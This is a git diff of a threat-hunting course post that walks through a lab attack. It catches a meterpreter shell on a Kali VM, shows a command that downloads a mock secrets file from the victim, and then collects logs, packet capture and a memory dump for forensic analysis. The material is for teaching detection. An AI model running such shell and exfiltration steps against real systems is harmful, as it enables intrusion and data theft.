faanross/faanross.github.io/content/posts/course01.md

 {{< figure src="/img/image049.png" title="" class="custom-figure" >}}

-5. We see some output, now to know if it worked let's head on back to our Kali VM.
+4. We see some output, now to know if it worked let's head on back to our Kali VM.
 We can immediately see that we received the connection and are now in a `meterpreter` shell - success!

 {{< figure src="/img/popped_shell.gif" title="" class="custom-figure" >}}

 {{< figure src="/img/image050.png" title="" class="custom-figure" >}}

-6. We can run a few commands if we'd like, also we'll exfiltrate the "nuclear launch codes" we created in the beginning.
+5. We can run a few commands if we'd like, also we'll exfiltrate the "nuclear launch codes" we created in the beginning.

 ```
-download C:\\Users\\user\\Desktop\\top_seekrit.txt /home/hacker/Desktop/
+download C:\\Users\\user\\Desktop\\tob_seekrit.txt /home/hacker/Desktop/
 ```
 {{< figure src="/img/image051.png" title="" class="custom-figure" >}}

 Additionally, we can also drop into a `shell`.

-{{< figure src="/img/image052.png" title="" class="custom-figure" >}}
+{{< figure src="/img/image052.png" title="" class="custom-figure-3" >}}

 That's it for our attack!

-# Artifact Collection
+# 2.3.6.
+Artifact Consolidation

-One final thing before we move one: lets concretize all our forensic artifacts.
+Since our attack is finish, let's package our logs, traffic capture, and memory dump.

+**Export Sysmon Log:**
-First we'll export our Sysmon log, run the following command in an administrative PowerShell terminal:
+Run the following command in an administrative PowerShell terminal:
 ```
 wevtutil epl "Microsoft-Windows-Sysmon/Operational" "C:\Users\User\Desktop\SysmonLog.evtx”
 ```
+**Export PowerShell Log:**

-Stay in the same administrative PowerShell terminal so we can also export our PowerShell ScriptBlock logs:
+In the same administrative PowerShell terminal export the PowerShell ScriptBlock logs:
 ```
 wevtutil epl "Microsoft-Windows-PowerShell/Operational" "C:\Users\User\Desktop\PowerShellScriptBlockLog.evtx" "/q:*[System[(EventID=4104)]]"
 ```
+**Export Traffic Capture:**
 Now let's stop our packet capture:
 1. Open WireShark.
 2. Press the red STOP button.
 3. Save the file, in my case I will save it to desktop as `dllattack.pcap`.

+**Export Sysmon Log:**
 And finally we'll dump the memory for our post-mortem analysis:
 1. Open a `Command Prompt` as administrator.
 2. Navigate to the directory where you saved `winpmem`, in my case it's on the desktop.
-3. We'll run the following command, meaning it will dump the memory and save it as `memdump.raw` in our present directory
+3. We'll run the following command, meaning it will dump the memory and save it as `memdump.raw` in our present directory (desktop):

 ```
 winpmem.exe memdump.raw
 ```

-Awesome.
-We're ready to move on to our analysis, however I wanna take a kinda "detour" chapter next to grant us a bit of perspective.
-If it sounds a bit befuddling now, please venture forth - soon it will make sense.

-{{< figure src="/img/confused_dude.gif" title="" class="custom-figure" >}}

 ***

 # Shenanigans!
 A (honest) review of our attack

-OK so let's just hold back for a second.
+OK so let's just hold zoom out and discuss the attack we just performed.
 At this point, if you have your wits about you, you might, and rightfully so I'll add, be calling **shenanigans** on me.

-{{< figure src="/img/shenanigans.gif" title="" class="custom-figure" >}}
+{{< figure src="/img/shenanigans.gif" title="" class="custom-figure-3" >}}

 "Wait", I hear you say, "if the whole point of infecting the victim and getting C2 control established is so that we can run commands on it, isn't it cheating then to be running these commands ahead of that actually happening"?

 Look at the meta: the whole point of establishing C2 on the victim is so we can run commands on it, but we literally just allowed ourselves to freely run commands on the victim so that we can establish C2.
-We wrote our malicious DLL to disk, injected our DLL-injection script into memory, and ran the script all from the comfort of Imaginationaland.
+We wrote our malicious DLL to disk, injected our DLL-injection script into memory, and ran the script all from the comfort of Imaginationland.

-{{< figure src="/img/imagination.gif" title="" class="custom-figure" >}}
+{{< figure src="/img/imagination.gif" title="" class="custom-figure-3" >}}

-So then the answer is yes.
+So then the answer is *yes*.
 That was cheating - of course.
-But, it's cheating with a purpose you see, the purpose here being that this is a course on threat hunting and not on initial compromise.
+But, it's cheating with a purpose you see, the purpose here being that this is a course on threat hunting.
 So we stripped the actions of the initial compromise down to its core and for now we've foregone our spearfishing email and VBA macro.
 We've streamlined the essence of the attack - we're expending less energy in the effort, and yet for our intents have created the same outcome.
-If you wanted a more realistic approximation of the initial compromise + other elements of Red Teaming - [here's a good free resource to get you going](https://www.youtube.com/watch?v=EIHLXWnK1Dw&list=PLBf0hzazHTGMjSlPmJ73Cydh9vCqxukCu)

-So, we won't be investing our time in completely recreating a realistic simulation of the intial compromise, HOWEVER, I do think it's very important for us to discuss here what it would look like.
-We are about to embark on a Threat Hunt, which is an investigation; but there would be no value for us to go attempting to discover things that exists only because of our specific "cheating" method here.
-Meaning: I want to make sure you understand which parts of the attack we just performed are representative of an actual acttack, and which are not.
+So, we won't be investing our time in completely recreating a realistic simulation of the intial compromise, *however*, I do think it's very important for us to discuss here what that would look like.
+We are about to embark on our threat hunt, which is an investigation; but there would be no value for us to go attempting to discover things that exists only because of our specific "cheating" method here.
+Meaning: I want to make sure you understand which parts of the attack we just performed are representative of an actual attack, and which are not.
 The reason for this of course is so we can focus on what really matters - ie that which we expect to see following a real-life attack.

 So the remainder of this section will be dedicated to that.
 I'm very briefly going to review all the main beats to the attack we just performed, thereafter I'll "translate" the actions to their real-world counterpart, pointing out specifically which elements we expect to see in an actual attack, and which we don't.